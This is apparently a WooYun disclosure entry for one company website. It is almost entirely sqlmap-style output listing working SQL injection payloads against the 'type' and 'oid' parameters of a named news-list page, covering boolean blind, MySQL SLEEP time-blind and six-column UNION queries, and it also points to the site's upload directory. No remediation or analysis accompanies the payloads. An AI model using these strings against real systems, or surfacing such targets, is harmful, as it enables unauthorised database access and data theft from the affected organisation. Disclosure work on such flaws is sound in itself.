WooYun.org

http://www.sregc.com.cn/news-list.php?type=gsnews&oid=333

---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=gsnews' AND 6036=6036 AND 'eBCd'='eBCd&oid=333
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=gsnews' AND (SELECT * FROM (SELECT(SLEEP(5)))eydv) AND 'BNOf'='BNOf&oid=333
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: type=-9727' UNION ALL SELECT NULL,NULL,CONCAT(0x717a627671,0x716e446157596a50774a,0x717
0716a71),NULL,NULL,NULL-- &oid=333
---

---
Parameter: oid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=gsnews&oid=333 AND 3139=3139
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=gsnews&oid=333 AND (SELECT * FROM (SELECT(SLEEP(5)))SnME)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: type=gsnews&oid=-6099 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x76665053435
846726349,0x7170716a71),NULL,NULL--
---

http://www.sregc.com.cn/upload/